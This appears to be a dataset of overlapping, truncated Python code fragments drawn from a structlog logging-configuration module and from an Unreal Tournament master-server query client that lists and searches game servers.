"if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name,",
"] hints += from_key_hints(event_dict) if all(hint is None for hint in hints): if",
"None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ]",
"exc_info is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ =",
"None: value = __structlog__() value = value.get(key) return value def from_key_hint(ed) -> Optional[str]:",
"= exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def",
"if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] =",
"json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO')",
"is not None: value = __structlog__() value = value.get(key) return value def from_key_hint(ed)",
"{message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict def",
"path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key: str, value: Any) ->",
"class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info',",
"``message`` value based on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a",
"bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper =",
"for key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return",
"[] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key:",
"def from_hint(ed): hint = event_dict.pop('hint', None) if hint is None: return try: return",
"event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or",
"str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog(",
"import events event = event_dict.get('event') if event is None: return event_dict if isinstance(event,",
"return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based on",
"for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it so that 0",
"in key_hints ] def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints",
"order_keys(order): \"\"\" Order keys for JSON readability when not using json_log=True \"\"\" def",
"= structlog.dev.ConsoleRenderer() # <=== else: # Make it so that 0 ⇒ None",
"add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: #",
"-> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None: return value =",
"timestamp to the event_dict if the log entry # is not from structlog.",
"'()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level':",
"} } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger,",
"def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event',",
"based on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path",
"hint = ', '.join(hint for hint in hints if hint is not None)",
"= __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates",
"key_path: str) -> Optional[Any]: value = dict_ for key in key_path.split('.'): if value",
"__structlog__() value = value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint',",
"'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate':",
"import structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass",
"is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints",
"Optional, List, Any, Dict import structlog import sys from k8s_snapshots import serialize class",
"key_hint is None: return value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed)",
"= json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [",
"event_dict): record = event_dict.get('_record') if record is None: return event_dict event_dict['function'] = record.funcName",
"None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans,",
"is not None and 'message' not in event_dict: event_dict['message'] = event event_dict['event'] =",
"error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value",
"# Add the log level and a timestamp to the event_dict if the",
"root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers':",
"level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors =",
"root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog':",
"key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def event_enum_to_str(logger, method_name, event_dict):",
"in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger, method_name,",
"{hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent']",
"json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for",
"return value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints",
"method_rame, event_dict): record = event_dict.get('_record') if record is None: return event_dict event_dict['function'] =",
"the event_dict if the log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info,",
"= 'DEBUG' else: root_logger_level = 'ERROR' logging_config = { 'version': 1, 'disable_existing_loggers': False,",
"logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event",
"f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is",
"= path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints',",
"value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints",
"import logging import logging.config from collections import OrderedDict from typing import Optional, List,",
"'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream':",
"None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the",
"] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it so",
"{ 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, },",
"): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name:",
"import logging.config from collections import OrderedDict from typing import Optional, List, Any, Dict",
"``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint is None: return",
"is not None) message = event_dict.get('message') if message is not None: message =",
"'message' not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def",
"level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict):",
"not None: value = __structlog__() value = value.get(key) return value def from_key_hint(ed) ->",
"f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'],",
"rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level =",
"event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event') if event is",
"None) if key_hints is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for",
"is None for hint in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event')",
"event_dict.get('event') if event is not None and 'message' not in event_dict: event_dict['message'] =",
"path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None)",
"\"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key",
"a ``message`` value based on the ``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]``",
"in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict prefix =",
"config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None,",
"Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is None: return value = path_value(ed,",
"-> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is None: return [] return",
"serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info =",
"= getattr(value, '__structlog__', None) if __structlog__ is not None: value = __structlog__() value",
"structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event =",
"'__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__()",
"[ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key: str, value:",
"return event_dict for key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return",
"if event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event'] = event.value return",
"is None: return try: return hint.format(**event_dict) except Exception as exc: return f'! error",
"else: message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging(",
"Optional[Any]: value = dict_ for key in key_path.split('.'): if value is None: return",
"add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else:",
"key_hint in key_hints ] def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}'",
"= ed.pop('key_hint', None) if key_hint is None: return value = path_value(ed, key_hint) return",
"order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make",
"processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event')",
"def format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict),",
"Creates a ``message`` value based on the ``hint`` and ``key_hint`` keys. ``key_hint`` :",
"for hint in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return event_dict",
"def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name,",
"= event_dict.get('event') if event is not None and 'message' not in event_dict: event_dict['message']",
"structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info",
"in key_path.split('.'): if value is None: return __structlog__ = getattr(value, '__structlog__', None) if",
"prefix = event_dict['event'] hint = ', '.join(hint for hint in hints if hint",
"event_dict.get('message') if message is not None: message = f'{prefix}: {message}, {hint}' else: message",
"return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in key_hints ] def format_kv(key: str,",
"= f'{prefix}: {message}, {hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message return",
"import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger, method_name, event_dict): exc_info",
"if all(hint is None for hint in hints): if event_dict.get('message') is None: event_dict['message']"
] |
[
"import pformat from .unrealserver import UnrealServer # Setup Logger import logging logger =",
"for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in server.info.items() if",
"kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout']",
"logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search",
"poll. port (int): The port number the master server is listening on \"\"\"",
"try: while True: msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg +=",
"wish to poll. port (int): The port number the master server is listening",
"\\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server)",
"UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement",
"def search_servers(self, query): \"\"\" Search for a given query in any of the",
"a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\'",
"{kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\"",
"f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server}",
"hostname self.port = port self.servers = [] if 'logger' not in kwargs: self.logger",
") for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [",
"\"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS name or IP",
"data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def",
"from pprint import pformat from .unrealserver import UnrealServer # Setup Logger import logging",
"the master server is listening on \"\"\" self.hostname = hostname self.port = port",
"hostname (str): Resolvable DNS name or IP address for the Master Server you'd",
"to look for in the dictionary keys Returns: A list of Servers \"\"\"",
"server is listening on \"\"\" self.hostname = hostname self.port = port self.servers =",
"(int): The port number the master server is listening on \"\"\" self.hostname =",
"in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return",
"all servers captured from the Master Server and capture info and status headers.",
"not in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}')",
"[] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in self.servers:",
"running.' ) def search_servers(self, query): \"\"\" Search for a given query in any",
"if not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword",
"else: self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5 else:",
"server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list",
"queries to end clients (whether they be Master Servers # or server clients),",
"for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\")",
"values in the server dict keys. Args: query (str): the search query to",
"query): \"\"\" Search for a given query in any of the values in",
"self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]),",
"Search for a given query in any of the values in the server",
"for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers",
"self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg = self.sock.recv(4096) if len(msg)",
"if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all servers captured",
"import concurrent.futures from pprint import pformat from .unrealserver import UnrealServer # Setup Logger",
"self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname (str):",
"logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class",
"'servers' to a list of Server objects. Returns: None \"\"\" # The Quake",
"except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for",
"statement Args: hostname (str): Resolvable DNS name or IP address for the Master",
"port self.servers = [] if 'logger' not in kwargs: self.logger = logger else:",
"self.servers = [] if 'logger' not in kwargs: self.logger = logger else: self.logger",
"\"\"\" Poll the Master Server for a client list and sets the class",
"to a list of Server objects. Returns: None \"\"\" # The Quake style",
"item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.'",
"status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor() as executor: executor.map(get_server_info,",
"self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in",
"(self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server for a client list",
"search_servers(self, query): \"\"\" Search for a given query in any of the values",
"= hostname self.port = port self.servers = [] if 'logger' not in kwargs:",
"# or server clients), need a header of 4 \\xFF bytes command =",
"self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in server.info.items() if re.search( query,",
"fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)}",
"Resolvable DNS name or IP address for the Master Server you'd wish to",
"a list of Server objects. Returns: None \"\"\" # The Quake style queries",
"for a given query in any of the values in the server dict",
"\\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results =",
"self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def",
"and sets the class attribute of 'servers' to a list of Server objects.",
"objects. Returns: None \"\"\" # The Quake style queries to end clients (whether",
"re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def poll_now(self):",
"kwargs: self.logger = logger else: self.logger = kwargs['logger'] if 'timeout' not in kwargs:",
"keys. Args: query (str): the search query to look for in the dictionary",
"keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in server.info.items() if re.search(",
"style queries to end clients (whether they be Master Servers # or server",
"of Servers \"\"\" if not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)}",
"logger else: self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5",
"(str): Resolvable DNS name or IP address for the Master Server you'd wish",
"client list and sets the class attribute of 'servers' to a list of",
"Returns: A list of Servers \"\"\" if not self.servers: return return_list = []",
"None \"\"\" # The Quake style queries to end clients (whether they be",
"for a client list and sets the class attribute of 'servers' to a",
"in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock",
"captured from the Master Server and capture info and status headers. Returns: None",
"socket import re import concurrent.futures from pprint import pformat from .unrealserver import UnrealServer",
"you'd wish to poll. port (int): The port number the master server is",
"msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:]",
"self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val",
"self.port = port self.servers = [] if 'logger' not in kwargs: self.logger =",
"def poll_now(self): \"\"\" Concurrently poll all servers captured from the Master Server and",
"Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self,",
"= '' try: while True: msg = self.sock.recv(4096) if len(msg) <= 0: break",
"servers captured from the Master Server and capture info and status headers. Returns:",
"servers running.' ) def search_servers(self, query): \"\"\" Search for a given query in",
"look for in the dictionary keys Returns: A list of Servers \"\"\" if",
"from .unrealserver import UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler())",
"and capture info and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with",
"return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server",
"[ key for key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE )",
"any of the values in the server dict keys. Args: query (str): the",
"UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query):",
"= self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as",
"def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args:",
"Servers # or server clients), need a header of 4 \\xFF bytes command",
"the server dict keys. Args: query (str): the search query to look for",
"if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise",
"] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all servers",
"server dict keys. Args: query (str): the search query to look for in",
"the class attribute of 'servers' to a list of Server objects. Returns: None",
"of Server objects. Returns: None \"\"\" # The Quake style queries to end",
"self.server) fullmsg = '' try: while True: msg = self.sock.recv(4096) if len(msg) <=",
"of the values in the server dict keys. Args: query (str): the search",
"\"\"\" self.hostname = hostname self.port = port self.servers = [] if 'logger' not",
"= kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname,",
"number the master server is listening on \"\"\" self.hostname = hostname self.port =",
"fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data",
"self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET,",
"clients), need a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending",
") ] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all",
"while True: msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8')",
"key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if info_results:",
"to end clients (whether they be Master Servers # or server clients), need",
"= [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in",
"UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS name or IP address",
"Server objects. Returns: None \"\"\" # The Quake style queries to end clients",
"in any of the values in the server dict keys. Args: query (str):",
"'' try: while True: msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg",
"to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg",
"kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port)",
"= socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the",
"the dictionary keys Returns: A list of Servers \"\"\" if not self.servers: return",
"return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all servers captured from the",
"Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname,",
"address for the Master Server you'd wish to poll. port (int): The port",
"str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently",
"= port self.servers = [] if 'logger' not in kwargs: self.logger = logger",
"else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server",
"for the Master Server you'd wish to poll. port (int): The port number",
"self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server =",
"import UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object):",
"the Master Server and capture info and status headers. Returns: None \"\"\" def",
"self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server for a",
"class init statement Args: hostname (str): Resolvable DNS name or IP address for",
"in the server dict keys. Args: query (str): the search query to look",
"self.hostname = hostname self.port = port self.servers = [] if 'logger' not in",
"Returns: None \"\"\" # The Quake style queries to end clients (whether they",
"dictionary keys Returns: A list of Servers \"\"\" if not self.servers: return return_list",
"class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init",
"f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try:",
"return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for",
"for in the dictionary keys Returns: A list of Servers \"\"\" if not",
"(str): the search query to look for in the dictionary keys Returns: A",
"self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning",
"command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server)",
"self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self,",
"keys Returns: A list of Servers \"\"\" if not self.servers: return return_list =",
"is listening on \"\"\" self.hostname = hostname self.port = port self.servers = []",
"= kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5 else: self.timeout =",
"search query to look for in the dictionary keys Returns: A list of",
"Poll the Master Server for a client list and sets the class attribute",
"e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]:",
"they be Master Servers # or server clients), need a header of 4",
") self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg = self.sock.recv(4096)",
"init statement Args: hostname (str): Resolvable DNS name or IP address for the",
"kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock =",
"as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in",
"if 'timeout' not in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed",
"key for key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ]",
"concurrent.futures from pprint import pformat from .unrealserver import UnrealServer # Setup Logger import",
"\"\"\" Concurrently poll all servers captured from the Master Server and capture info",
"clients (whether they be Master Servers # or server clients), need a header",
"= fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found",
"return return_list def poll_now(self): \"\"\" Concurrently poll all servers captured from the Master",
"len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e",
"info and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor() as",
"sets the class attribute of 'servers' to a list of Server objects. Returns:",
"class attribute of 'servers' to a list of Server objects. Returns: None \"\"\"",
"The port number the master server is listening on \"\"\" self.hostname = hostname",
"pprint import pformat from .unrealserver import UnrealServer # Setup Logger import logging logger",
"{self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg =",
"IP address for the Master Server you'd wish to poll. port (int): The",
"list of Server objects. Returns: None \"\"\" # The Quake style queries to",
"not in kwargs: self.logger = logger else: self.logger = kwargs['logger'] if 'timeout' not",
"\"\"\" if not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for",
"socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item",
"UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def",
"= logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\"",
"info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll all servers captured from",
"list and sets the class attribute of 'servers' to a list of Server",
"kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self):",
"name or IP address for the Master Server you'd wish to poll. port",
"the Master Server for a client list and sets the class attribute of",
"self.logger = logger else: self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout",
"re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\" Concurrently poll",
"<= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw",
"A list of Servers \"\"\" if not self.servers: return return_list = [] self.logger.info(",
"Master Servers # or server clients), need a header of 4 \\xFF bytes",
